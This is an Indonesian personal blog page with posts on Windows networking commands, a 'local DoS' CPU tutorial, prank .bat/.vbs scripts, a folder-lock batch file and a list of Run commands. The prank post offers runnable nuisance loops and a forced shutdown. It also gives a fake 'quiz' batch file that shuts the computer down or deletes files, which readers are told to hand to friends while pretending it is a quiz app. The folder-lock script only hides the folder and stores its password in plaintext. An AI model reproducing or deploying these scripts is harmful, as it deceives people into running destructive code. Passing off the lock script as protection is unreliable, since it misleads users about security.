[PRE ORDER]

whos.amung.us

Berselancar internet dengan leluasa dan aman di kantor (ZenMate)

Bebas berselancar internet tanpa halangan

Virtual Android Genymotion PC

Berandroid di komputer dengan visual berbagai smartphone

Seting koneksi internet Android Bluestacks menggunakan Proxy Cap

Menseting internet pada Bluestacks yang menggunakan proxy

BerAndroid dikomputer menggunakan Bluestack Build 0.7.14.901 Rooted Version

Menseting internet pada Bluestacks yang menggunakan proxy

Kontes: Stand Up Kompas TV Youtube 2013

Heiiiii kalian yang suka ngelawak, kalian yang biasanya merasa paling lucu, suka ngomong, nih Kompas TV lagi ngadain kontes stand up. Mending kalian salurin bakat kalian itu ke sini deh. Mayanlah bisa ngeksis di youtube, atau malah bisa ngetop di TiPi. Kontes ini berlangsung dari 12 Oktober sampai 15 Desember 2013

Kontes: Kontes Foto bersama Volkswagen (VW).

Hayooo siapa yang pengen naik mobil Volkswagen (VW) terbaru ??? bagi yang pengen aja nih ya. Peserta dapat mengirimkan foto mulai 26 September 2013 sampai dengan 31 Oktober 2013

Kontes: Ceritakan pengalaman minum kopi berhadiah 3 iPod Touch 5th Gen dan 3 kamera Instax.

Buat cerita tentang meraih inginmu dengan cara yang fun, unik, berani, atau orisinil yang berawal dari Ngopi Jadi...

Kontes: Fotografi ASTRA 2013

Astra Indonesia menggelar Lomba foto Astra 2013, tunjukkan kreasi mu lewat fotografi. dengan semangat satukan karya, bangun bangsa, astra mengundang para pecinta fotografi untuk mengabadikan momen-momen semangat berkarya dalam bidang yang menjadi fokus grup astra

Kontes: Youth Art Festival 2013

International Program News (IP News) Universitas Islam Indonesia menggelar lomba Fotografi se-Indonesia. bekerjasama dengan US Embassy. Pendaftaran dan pngumpulan online 14 Februari 2013 - 30 Maret 2013

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Oxsitech.blogspot.com

Masukkan alamat email anda:

Kamis, 21 April 2011

Aktivitas Hacking

Posting yang saya tulis tentang hacking ini hanya sebagai pembelajaran, saya mengharapkan agar tidak melakukan hal-hal yang dapat merugikan orang lain. Semua Aktivitas hacking pada dasarnya tidak merusak, itu semua dikembalikan kepada diri kita masing-masing. hacking program.pdf



IP CONFIG


IPConfig adalah salah satu internal command di MS. Command Prompt (CMD) yang berfungsi untuk melihat dan mengkonfigurasi settingan perangkat jaringan.



 

Macam Macam Penggunaan perintah Ipconfig.



Caranya hanyalah dengan mengetikkan ipconfig dalam jendela kerja DOS.



Sekarang anda sudah tahu berapa ip address yang digunakan oleh komputer anda kan.


Connection-specific DNS Suffix  :

IP Address                      : 10.10.10.14

Subnet Mask                     : 255. 255. 255. 0

Default Gateway                 : 10.10.10.1


Untuk mendapatkan informasi yang lebih detail, termasuk DNS dan sebagainya, maka yang harus diketik adalah ipconfig /all.


Tidak Cuma itu saja, dengan opsi /all akan menampilkan juga MAC Address untuk setiap adapter yang ada dalam komputer anda.




GETMAC

Cara lainya untuk mendapatkan MAC Address dalam komputer kita, selain menggunakan perintah ipconfig /all, dalam DOS anda juga bisa menggunakan perintah getmac.




ROUTE

Perintah Route berfungsi menampilkan informasi mengenai local route.


Perintah pengetikannya seperti berikut: route print




PING

Ping (kadangkala disebut sebagai singkatan dari Packet Internet Gopher) adalah sebuah program utilitas yang dapat digunakan untuk memeriksa konektivitas jaringan berbasis teknologi Transmission Control Protocol/Internet Protocol (TCP/IP). Dengan menggunakan utilitas ini, dapat diuji apakah sebuah komputer terhubung dengan komputer lainnya. Hal ini dilakukan dengan mengirim sebuah paket kepadaalamat hendak diujicoba konektivitasnya dan menunggu respon darinya.


Contoh Ping

Utilitas ping akan menunjukkan hasil yang positif jika dua buah komputer saling terhubung di dalam sebuah jaringan. Hasil berupa statistik keadaan koneksi kemudian ditampilkan di bagian akhir. Kualitas koneksi dapat dilihat dari besarnya waktu pergi-pulang (roundtrip) dan besarnya jumlah paket yang hilang (packet loss). Semakin kecil kedua angka tersebut, semakin bagus kualitas koneksinya.



Dari data tersebut diatas bisa diketahui bahwa saya melakukan perintah ping pada target situs www.google.com. Data yang dikirimkan adalah sebesar 32 bytes. Dan kemudian data tersebut dibalas kembali selama 116ms, dan begitu pula untuk data 32 bytes  berikutnya selama 119ms.

Disini terlihat paket yang berhasil dikirim 4 kali, dan data paket yang hilang (0% loss).

Dalam penggunaan perintah ping ini pun masih ada opsi pilihan lainnya seperti:

Code :




Pilihan:
-t Ping host tertentu sampai berhenti.
Untuk melihat statistik dan terus - type Control-Break;
Untuk menghentikan - tekan Control-C.
-a Putuskan alamat ke nama host.
-n count Jumlah echo permintaan untuk mengirim.
-l size Send ukuran buffer.
-f Set Jangan bendera Fragmen dalam paket.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route untuk jumlah hop.
-s count Timestamp untuk menghitung hop.
-j host-list Loose source route sepanjang host-list.
-k host-list Strict source route sepanjang host-list.
-w timeout Timeout dalam milidetik untuk menunggu jawaban masing-masing.





Contoh:  penggunaan opsi –t (dan dimungkinkan untuk menkombinasikan opsi lain dalam satu perintah)



TRACERT

Tracert berguna untuk menampilkan jalur data yang berjalan menuju server tujuan. Tujuan awal dari fungsi tracert adalah untuk mengetahui, apakah ada masalah dalam jaringan saat anda melakukan koneksi tidak hanya disebabkan tempat tujuan sedang mati, mungkin saja ada masalah pada router di suatu lokasi. Sebab, sebelum reques mencapai target, prosesnya akan melalui beberapa router pada salah satu router.


Tracert akan menampilkan ip address dan hostname dari setiap hop yang dilewati sampai target.

Cara pengetikan sebagai berikut: trecert www.google.com


hacking program.pdf

Praktik Local Dos Attack

Pada praktik local DoS, saya akan memberikan contoh local DoS yang bisa meningkatkan kegiatan CPU hingga 100%, berikut langkah-langkahnya: praktik local dos attack.pdf

1.      Bukalah notepad (cara cepat winkey+R ketik notepad)

2.      Ketikkan script berikut



3.      Simpan dengan nama coba.bat . Caranya, klik pada notepad File-Save as, ubah Save as type menjadi All File kemudian ketikkan coba .bat lalu klik Save (simpan di My Document).




4.       Buka folder My Document maka akan muncul tampilan berikut.



5.       Klik dua kali pada coba.bat

6.       Tekan tombol di keyboard Ctrl+Alt+Del secara bersamaan untuk mengetahui aktivitas CPU., dan pilih tabs Performance. Maka akan muncul tampilan dibawa ini.





 



7.       Terlihat aktivitas CU hingga 100%. Untuk menghentikan close coba.bat, klik X pada coba.bat  praktik local dos attack.pdf

Rabu, 20 April 2011

Iseng pake file .bat dan .vbs windows


Terinspirasi dari ngomprek registry, trus malah nemu file .bat dan .vbs . Dengan sedikit menggunankan algoritma dan sedikit rasa usil, saya mau share nih script-script yang lumayan ngeselin. Tapi diharapkan jangan di gunain buat hal2 yang merugikan  ya.. .
Nih langsung aja ...
perlu di ingat untuk membuat file . bat dan .vbs , saat menympan file pada save as type pilih all files dan pada nama file tambahkan . bat atau .vbs.

Langkat pertama buka notepad lalu ketikkan scrip berikut:

1. message yang muncul melulu

code: 
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT

2. bikin shutdown+message
code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"
save namafile.bat

3. mainin Caps Lock button
code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4. buka tutup CD/DVD

code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs

5. bikin vbscript nongol mlulu
code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs

6. teken tombol backspace mlulu

code:
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7. otomatis ngetik "lu jelek banget sih" di notepad/word
code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8. buka notepad trus menerusc

code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.bat

9. otomatis buka notepad lalu ngetik apa yg lo mau

code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
save namafile.vbs

Buat tambahan
dari script diatas temen2 kembangin aja lagi...misal kayak gini nih
Code:
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis...
ket di atas :
kalo pilih
1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2.

Nah selamat berkreasi,, tapi jangan sering2 ngusilin orang, nanti kualat. :)

Kamis, 14 April 2011

Mengunci folder dengan file .bat


Jika anda ingin file-file rahasia anda tidak ingin dibuka oleh orang lain,maka anda harus menguncinya.Di sini saya akan memberitahu cara untuk mengunci sebuah folder dengan mudah.Simak baik-baik!

Pertama kita akan membuat sebuah script dengan notepad.

Berikut langkah-langkahnya :

1. Start => All programs => Accessories => Notepad

2. Kemudian copy script dibawah ini dan paste ke notepad tersebut.

CLS
@ECHO OFF
Title Folder Folder-Artikel
If EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto SANDINYA
If NOT EXIST Folder-Artikel goto MDFOLDER
:KONFIRMASI
Echo Apakah anda ingin mengunci Folder-Artikel ini ? (Y/N)
Echo Tekan Tombol [Y/y] atau [N/n].
Set/p "cho=>"
If %cho%==Y goto KUNCI
If %cho%==y goto KUNCI
If %cho%==N goto END
If %cho%==n goto END
Goto KONFIRMASI
:KUNCI
Ren Folder-Artikel "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Echo Folder-Artikel Terkunci
Goto End
:SANDINYA
Echo Masukkan Password untuk membuka proteksi ini!!
Set/p "pass=>"
If %pass%== Masukkan Password goto BUKA
If NOT %pass%== Masukkan Password goto SALAH
:BUKA
Attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
Ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Folder-Artikel
Echo Folder-Artikel sudah di buka
Pause
Goto End
:SALAH
Echo Password anda salah
Pause
Goto End
:MDFOLDER
Md Folder-Artikel
Echo Folder-Artikel berhasil dibuat.
Pause
Goto End
:End

3. Silahkan anda ganti tulisan “Masukkan Password” dengan password yang anda inginkan.

4. Save As File tersebut dengan nama Make-it.bat

5. Kemudian, double klik file Make-it.bat ( maka Make-it.bat akan membuat Folder pribadi dengan nama “Folder-Artikel” ), anda bisa menyimpan file-file penting yang anda miliki di folder ini.

6. Klik kembali file Make-it.bat dan masukkan “Y/y” untuk mengunci folder tersebut.

7. Untuk membuka nya maka anda bisa double klik file Make-it.bat kembali dan masukkan password anda.

Selamat Mencoba....

156 Run Commands [Perintah² Di Run]



Kadang kita ingin membuka program pada windows, ini adalah salah satu kemudahan yang disediakan windows yaitu dengan memangil program dengan Run
caranya yaitu dengan menekan keyWindows+R lalu ketik perintah berikut:

Accessibility Controls
access.cpl
Accessibility Wizard
accwizAdd Hardware Wizard
hdwwiz.cpl

Add/Remove Programs
appwiz.cpl

Administrative Tools
control admintools

Adobe Acrobat (if installed)
acrobat

Adobe Designer (if installed)
acrodist

Adobe Distiller (if installed)
acrodist

Adobe ImageReady (if installed)
imageready

Adobe Photoshop (if installed)
photoshop

Automatic Updates
wuaucpl.cpl

Bluetooth Transfer Wizard
fsquirt

Calculator
calc

Certificate Manager
certmgr.msc

Character Map
charmap

Check Disk Utility
chkdsk

Clipboard Viewer
clipbrd

Command Prompt
cmd

Component Services

dcomcnfg

Computer Management
compmgmt.msc

Control Panel
control

Date and Time Properties
timedate.cpl

DDE Shares
ddeshare

Device Manager
devmgmt.msc

Direct X Control Panel (If Installed)*
directx.cpl

Direct X Troubleshooter
dxdiag

Disk Cleanup Utility
cleanmgr

Disk Defragment
dfrg.msc

Disk Management
diskmgmt.msc

Disk Partition Manager
diskpart

Display Properties
control desktop

Display Properties
desk.cpl

Display Properties (w/Appearance Tab Preselected)
control color

Dr. Watson System Troubleshooting Utility
drwtsn32

Driver Verifier Utility
verifier

Event Viewer
eventvwr.msc

Files and Settings Transfer Tool

migwiz

File Signature Verification Tool

sigverif

Findfast
findfast.cpl

Firefox (if installed)
firefox

Folders Properties
control folders

Fonts
control fonts

Fonts Folder

fonts

Free Cell Card Game
freecell

Game Controllers
joy.cpl

Group Policy Editor (XP Prof)
gpedit.msc

Hearts Card Game
mshearts

Help and Support

helpctr

HyperTerminal
hypertrm

Iexpress Wizard
iexpress

Indexing Service
ciadv.msc

Internet Connection Wizard
icwconn1

Internet Explorer
iexplore

Internet Properties
inetcpl.cpl

Internet Setup Wizard
inetwiz

IP Configuration (Display Connection Configuration)
ipconfig /all

IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns

IP Configuration (Release All Connections)
ipconfig /release

IP Configuration (Renew All Connections)
ipconfig /renew

IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns

IP Configuration (Display DHCP Class ID)
ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid

Java Control Panel (If Installed)
jpicpl32.cpl

Java Control Panel (If Installed)
javaws

Keyboard Properties
control keyboard

Local Security Settings
secpol.msc

Local Users and Groups
lusrmgr.msc

Logs You Out Of Windows
logoff

Malicious Software Removal Tool
mrt

Microsoft Access (if installed)
access.cpl

Microsoft Chat
winchat

Microsoft Excel (if installed)
excel

Microsoft Frontpage (if installed)
frontpg

Microsoft Movie Maker
moviemk

Microsoft Paint
mspaint

Microsoft Powerpoint (if installed)
powerpnt

Microsoft Word (if installed)
winword

Microsoft Syncronization Tool
mobsync


Minesweeper Game
winmineMouse Properties
control mouseMouse Properties
main.cpl

Nero (if installed)
nero

Netmeeting
conf

Network Connections
control netconnections

Network Connections
ncpa.cpl

Network Setup Wizard
netsetup.cpl

Notepad
notepad

Nview Desktop Manager (If Installed)
nvtuicpl.cpl

Object Packager
packager

ODBC Data Source Administrator
odbccp32.cpl

On Screen Keyboard
osk

Opens AC3 Filter (If Installed)
ac3filter.cpl

Outlook Express
msimn

Paint
pbrush

Password Properties
password.cpl

Performance Monitor
perfmon.msc

Performance Monitor
perfmon

Phone and Modem Options
telephon.cpl

Phone Dialer
dialer

Pinball Game
pinball

Power Configuration
powercfg.cpl

Printers and Faxes

control printers

Printers Folder
printers

Private Character Editor

eudcedit

Quicktime (If Installed)
QuickTime.cpl

Quicktime Player (if installed)
quicktimeplayer

Real Player (if installed)
realplay

Regional Settings
intl.cpl

Registry Editor
regedit

Registry Editor
regedit32

Remote Access Phonebook
rasphone

Remote Desktop
mstsc

Removable Storage
ntmsmgr.msc

Removable Storage Operator Requests
ntmsoprq.msc

Resultant Set of Policy (XP Prof)
rsop.msc

Scanners and Cameras
sticpl.cpl

Scheduled Tasks
control schedtasks

Security Center
wscui.cpl

Services
services.msc

Shared Folders
fsmgmt.msc

Shuts Down Windows
shutdown

Sounds and Audio
mmsys.cpl

Spider Solitaire Card Game
spider

SQL Client Configuration
cliconfg

System Configuration Editor
sysedit

System Configuration Utility
msconfig

System File Checker Utility (Scan Immediately)
sfc /scannow

System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce

System File Checker Utility (Scan On Every Boot)
sfc /scanboot

System File Checker Utility (Return to Default Setting)
sfc /revert

System File Checker Utility (Purge File Cache)
sfc /purgecache

System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x

System Information
msinfo32

System Properties
sysdm.cpl

Task Manager
taskmgr

TCP Tester
tcptest

Telnet Client
telnet

Tweak UI (if installed)
tweakui

User Account Management

nusrmgr.cpl

Utility Manager
utilman

Windows Address Book
wab

Windows Address Book Import Utility
wabmig

Windows Backup Utility (if installed)
ntbackup

Windows Explorer
explorer

Windows Firewall
firewall.cpl

Windows Magnifier
magnify

Windows Management Infrastructure
wmimgmt.msc

Windows Media Player
wmplayer

Windows Messenger
msmsgs

Windows Picture Import Wizard (need camera connected)
wiaacmgr

Windows System Security Tool
syskey

Windows Update Launches
wupdmgr

Windows Version (to show which version of windows)
winver

Windows XP Tour Wizard
tourstart

Wordpad
write